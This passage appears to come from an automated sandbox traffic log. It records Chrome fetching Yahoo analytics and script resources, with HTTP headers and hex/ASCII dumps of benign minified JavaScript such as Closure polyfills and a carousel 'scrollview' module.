                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: eturn e(this,function(h){return h.key})};c.prototype.values=function(){return e(this,function(h){return h.value})};c.prototype.forEach=function(h,k){for(var l=v(this,"entries").call(this),q;!(q=l.next()).done;)q=q.value,h.call(k,q[1],q[0],this)};c.prototy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1390INData Raw: 29 29 2e 64 6f 6e 65 3b 29 74 68 69 73 2e 61 64 64 28 64 2e 76 61 6c 75 65 29 7d 74 68 69 73 2e 73 69 7a 65 3d 74 68 69 73 2e 67 2e 73 69 7a 65 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 61 64 64 3d 66 75 6e 63 74 69 6f 6e 28 63 29 7b 63 3d 63 3d 3d 3d 30 3f 30 3a 63 3b 74 68 69 73 2e 67 2e 73 65 74 28 63 2c 63 29 3b 74 68 69 73 2e 73 69 7a 65 3d 74 68 69 73 2e 67 2e 73 69 7a 65 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 6c 65 74 65 3d 66 75 6e 63 74 69 6f 6e 28 63 29 7b 63 3d 74 68 69 73 2e 67 2e 64 65 6c 65 74 65 28 63 29 3b 74 68 69 73 2e 73 69 7a 65 3d 74 68 69 73 2e 67 2e 73 69 7a 65 3b 72 65 74 75 72 6e 20 63 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6c 65 61 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: )).done;)this.add(d.value)}this.size=this.g.size};b.prototype.add=function(c){c=c===0?0:c;this.g.set(c,c);this.size=this.g.size;return this};b.prototype.delete=function(c){c=this.g.delete(c);this.size=this.g.size;return c};b.prototype.clear=function(){thi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1390INData Raw: 67 75 6c 61 72 20 65 78 70 72 65 73 73 69 6f 6e 22 29 3b 72 65 74 75 72 6e 20 61 2b 22 22 7d 3b 77 28 22 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 69 6e 63 6c 75 64 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 20 76 61 28 74 68 69 73 2c 62 2c 22 69 6e 63 6c 75 64 65 73 22 29 2e 69 6e 64 65 78 4f 66 28 62 2c 63 7c 7c 30 29 21 3d 3d 2d 31 7d 7d 2c 22 65 73 36 22 29 3b 77 28 22 41 72 72 61 79 2e 66 72 6f 6d 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 2c 64 29 7b 63 3d 63 21 3d 6e 75 6c 6c 3f 63 3a 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 20 68 7d 3b 76 61 72 20 65 3d 5b 5d 2c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: gular expression");return a+""};w("String.prototype.includes",function(a){return a?a:function(b,c){return va(this,b,"includes").indexOf(b,c||0)!==-1}},"es6");w("Array.from",function(a){return a?a:function(b,c,d){c=c!=null?c:function(h){return h};var e=[],
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1390INData Raw: 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 20 67 3e 3d 66 7d 7d 2c 22 65 73 36 22 29 3b 76 61 72 20 77 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 53 74 72 69 6e 67 26 26 28 61 2b 3d 22 22 29 3b 76 61 72 20 63 3d 30 2c 64 3d 21 31 2c 65 3d 7b 6e 65 78 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 64 26 26 63 3c 61 2e 6c 65 6e 67 74 68 29 7b 76 61 72 20 66 3d 63 2b 2b 3b 72 65 74 75 72 6e 7b 76 61 6c 75 65 3a 62 28 66 2c 61 5b 66 5d 29 2c 64 6f 6e 65 3a 21 31 7d 7d 64 3d 21 30 3b 72 65 74 75 72 6e 7b 64 6f 6e 65 3a 21 30 2c 76 61 6c 75 65 3a 76 6f 69 64 20 30 7d 7d 7d 3b 65 5b 76 28 74 2e 53 79 6d 62 6f 6c 2c 22 69 74 65 72 61 74 6f 72 22 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 3b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: eturn!1;return g>=f}},"es6");var wa=function(a,b){a instanceof String&&(a+="");var c=0,d=!1,e={next:function(){if(!d&&c<a.length){var f=c++;return{value:b(f,a[f]),done:!1}}d=!0;return{done:!0,value:void 0}}};e[v(t.Symbol,"iterator")]=function(){return e};
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1390INData Raw: 6f 73 75 72 65 20 4c 69 62 72 61 72 79 20 41 75 74 68 6f 72 73 2e 20 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 20 0a 2a 2f 20 0a 76 61 72 20 7a 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 79 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 78 61 28 22 43 4c 4f 53 55 52 45 5f 46 4c 41 47 53 22 29 3b 61 3d 63 26 26 63 5b 61 5d 3b 72 65 74 75 72 6e 20 61 21 3d 6e 75 6c 6c 3f 61 3a 62 7d 2c 78 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 61 2e 73 70 6c 69 74 28 22 2e 22 29 3b 66 6f 72 28 76 61 72 20 62 3d 7a 2c 63 3d 30 3b 63 3c 61 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 69 66 28 62 3d 62 5b 61 5b 63 5d 5d 2c 62 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 72 65 74 75 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: osure Library Authors. SPDX-License-Identifier: Apache-2.0 */ var z=this||self,ya=function(a,b){var c=xa("CLOSURE_FLAGS");a=c&&c[a];return a!=null?a:b},xa=function(a){a=a.split(".");for(var b=z,c=0;c<a.length;c++)if(b=b[a[c]],b==null)return null;retur


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    115192.168.2.4498813.75.62.374434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1003OUTGET /ups/58784/sync?format=json&gdpr=false&gdpr_consent=&gpp=DBAA&gpp_sid=-1&us_privacy=1YNN HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: ups.analytics.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: application/json
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Origin: https://www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC539INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:21:02 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: IDSYNC=19cw~2kzt;Version=1;Domain=.analytics.yahoo.com;Path=/;Max-Age=31536000;Expires=Tue, 30-Sep-2025 17:21:02 GMT;Secure;SameSite=None
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS/9.1.10.137
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC4INData Raw: 33 30 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 30
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC48INData Raw: 7b 22 61 78 69 64 22 3a 20 22 79 2d 50 4d 4f 70 33 74 68 45 32 75 4c 68 79 79 38 51 46 42 6b 41 4b 47 71 4e 67 4c 76 7a 6e 65 47 34 7e 41 22 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: {"axid": "y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A"}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC5INData Raw: 0d 0a 30 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii:


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    116192.168.2.44987387.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC544OUTGET /aaq/wf/wf-scrollview-2.23.3-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC719INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: 15oxgLYqLLPokQ+0hLvVelTUT2HiQKXAcy44JBEhNjLMVDpntAnzQi5dxn3UalLWZSJQejE3A9M=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: N0N4ZDVNDQ0JQPQA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 16:28:44 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Thu, 13 Jun 2024 07:21:57 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "4636cb14c3d8d1eba5bb4da2cfcf18aa"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: wbLD4opJICdradPjNHbYrnSOdnE8aBLq
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 35505
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 3140
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 73 63 72 6f 6c 6c 76 69 65 77 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 73 63 72 6f 6c 6c 76 69 65 77 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-scrollview",[],t):"object"==typeof exports?exports["wafer-scrollview"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 20 73 75 70 65 72 28 29 20 68 61 73 6e 27 74 20 62 65 65 6e 20 63 61 6c 6c 65 64 22 29 3b 72 65 74 75 72 6e 21 74 7c 7c 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 20 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 74 3f 65 3a 74 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 65 2c 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 74 26 26 6e 75 6c 6c 21 3d 3d 74 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 2c 20 6e 6f 74 20 22 2b 74 79 70 65 6f 66 20 74 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: super() hasn't been called");return!t||"object"!=typeof t&&"function"!=typeof t?e:t}function l(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Super expression must either be null or a function, not "+typeof t);e.prototype=Object.create(t&&t.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 76 61 72 20 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 7b 7d 2c 69 3d 74 2e 77 69 6e 64 6f 77 4c 69 6d 69 74 2c 72 3d 76 6f 69 64 20 30 3d 3d 3d 69 3f 35 3a 69 3b 73 28 74 68 69 73 2c 65 29 2c 74 68 69 73 2e 61 63 74 69 76 65 3d 6e 75 6c 6c 2c 74 68 69 73 2e 65 6c 65 6d 4d 61 70 70 69 6e 67 3d 6e 65 77 20 4d 61 70 2c 74 68 69 73 2e 74 61 69 6c 3d 6e 75 6c 6c 2c 74 68 69 73 2e 63 79 63 6c 65 3d 21 31 2c 74 68 69 73 2e 68 65 61 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 63 72 6f 6c 6c 49 74 65 6d 73 4c 69 6d 69 74 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 72 2f 32 29 7d 72 65 74 75 72 6e 20 64 28 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: {function e(){var t=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{},i=t.windowLimit,r=void 0===i?5:i;s(this,e),this.active=null,this.elemMapping=new Map,this.tail=null,this.cycle=!1,this.head=null,this.scrollItemsLimit=Math.floor(r/2)}return d(e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 6f 6c 6c 49 74 65 6d 73 4c 69 6d 69 74 3b 69 66 28 74 68 69 73 2e 63 79 63 6c 65 29 7b 69 3c 3d 32 3f 73 3d 30 3a 69 3c 3d 33 26 26 28 73 3d 31 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 65 74 46 6f 72 77 61 72 64 28 73 2b 31 29 7d 72 65 74 75 72 6e 20 74 3c 73 3f 6e 75 6c 6c 3a 69 3e 74 2b 73 2d 31 3f 74 68 69 73 2e 67 65 74 46 6f 72 77 61 72 64 28 73 2b 31 29 3a 6e 75 6c 6c 7d 7d 2c 7b 6b 65 79 3a 22 67 65 74 45 6c 65 6d 65 6e 74 54 6f 50 72 65 70 65 6e 64 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 65 6c 65 6d 4d 61 70 70 69 6e 67 2e 67 65 74 28 74 68 69 73 2e 61 63 74 69 76 65 29 2c 74 3d 65 2e 67 65 74 28 22 69 6e 64 65 78 22 29 2c 69 3d 74 68 69 73 2e 65 6c 65 6d 4d 61 70 70 69 6e 67 2e 73 69 7a 65 2c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ollItemsLimit;if(this.cycle){i<=2?s=0:i<=3&&(s=1);return this.getForward(s+1)}return t<s?null:i>t+s-1?this.getForward(s+1):null}},{key:"getElementToPrepend",value:function(){var e=this.elemMapping.get(this.active),t=e.get("index"),i=this.elemMapping.size,
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 6c 65 6d 4d 61 70 70 69 6e 67 2e 73 69 7a 65 7d 7d 5d 29 2c 65 7d 28 29 2c 70 3d 66 2c 6d 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 69 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3b 66 6f 72 28 76 61 72 20 73 20 69 6e 20 69 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 69 2c 73 29 26 26 28 65 5b 73 5d 3d 69 5b 73 5d 29 7d 72 65 74 75 72 6e 20 65 7d 2c 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 69 3d 30 3b 69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: tion(){return this.elemMapping.size}}]),e}(),p=f,m=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var s in i)Object.prototype.hasOwnProperty.call(i,s)&&(e[s]=i[s])}return e},g=function(){function e(e,t){for(var i=0;i
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 5b 22 69 6e 64 65 78 22 5d 2c 4b 3d 22 6f 6e 74 6f 75 63 68 73 74 61 72 74 22 69 6e 20 77 69 6e 64 6f 77 2c 51 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 4b 26 26 28 65 2e 73 74 79 6c 65 2e 63 75 72 73 6f 72 3d 74 29 7d 2c 5a 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 5b 5d 2c 74 3d 21 31 3b 72 65 74 75 72 6e 7b 61 64 64 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 69 29 7b 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 63 61 6c 6c 28 65 29 7d 7d 28 69 29 29 2c 74 68 69 73 2e 65 78 65 63 28 69 2e 5f 75 74 69 6c 2e 74 72 61 6e 73 69 74 69 6f 6e 44 75 72 61 74 69 6f 6e 29 7d 2c 65 78 65 63 3a 66 75 6e 63 74 69 6f 6e 28 69 29 7b 76 61 72 20 73 3d 74 68 69 73 3b 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ["index"],K="ontouchstart"in window,Q=function(e,t){K&&(e.style.cursor=t)},Z=function(){var e=[],t=!1;return{add:function(t,i){e.push(function(e){return function(){return t.call(e)}}(i)),this.exec(i._util.transitionDuration)},exec:function(i){var s=this;t
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 73 3a 41 2c 69 6e 64 69 63 61 74 6f 72 50 61 67 69 6e 61 74 69 6f 6e 3a 67 2c 69 6e 64 69 63 61 74 6f 72 73 43 75 73 74 6f 6d 43 6f 75 6e 74 3a 76 2c 69 6e 64 69 63 61 74 6f 72 54 79 70 65 3a 5f 2c 69 6e 64 69 63 61 74 6f 72 57 69 74 68 43 6f 75 6e 74 45 6c 65 6d 3a 6b 2c 69 6e 64 69 63 61 74 6f 72 57 69 74 68 6f 75 74 43 6f 75 6e 74 45 6c 65 6d 3a 53 2c 73 6e 61 70 42 65 68 61 76 69 6f 72 3a 64 2c 73 6c 69 64 65 72 45 6c 65 6d 3a 4d 28 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 73 6c 69 64 65 73 22 29 29 5b 30 5d 7c 7c 65 2c 62 65 68 61 76 69 6f 72 3a 63 2c 6e 65 78 74 42 74 6e 3a 4d 28 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 6e 65 78 74 2d 62 74 6e 22 29 29 5b 30 5d 2c 70 72 65 76
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: s:A,indicatorPagination:g,indicatorsCustomCount:v,indicatorType:_,indicatorWithCountElem:k,indicatorWithoutCountElem:S,snapBehavior:d,sliderElem:M(e.getElementsByClassName("slides"))[0]||e,behavior:c,nextBtn:M(e.getElementsByClassName("next-btn"))[0],prev
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 6a 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 4c 2b 22 62 6f 75 6e 64 61 72 79 22 29 2c 55 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 4c 2b 22 74 72 69 67 67 65 72 2d 77 66 2d 64 75 72 69 6e 67 2d 74 72 61 6e 73 69 74 69 6f 6e 22 29 2c 4b 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 4c 2b 22 73 63 72 6f 6c 6c 76 69 65 77 2d 74 64 22 29 2c 5a 3d 4e 75 6d 62 65 72 28 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 4c 2b 22 61 75 74 6f 2d 73 77 69 74 63 68 22 29 29 7c 7c 30 2c 24 3d 4e 75 6d 62 65 72 28 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 4c 2b 22 61 75 74 6f 2d 73 77 69 74 63 68 2d 64 69 73 61 62 6c 65 2d 68 6f 76 65 72 22 29 29 7c 7c 30 2c 65 65 3d 4e 75 6d 62 65 72 28 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 4c 2b 22 64 69 73 61 62
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: j=e.getAttribute(L+"boundary"),U=e.getAttribute(L+"trigger-wf-during-transition"),K=e.getAttribute(L+"scrollview-td"),Z=Number(e.getAttribute(L+"auto-switch"))||0,$=Number(e.getAttribute(L+"auto-switch-disable-hover"))||0,ee=Number(e.getAttribute(L+"disab
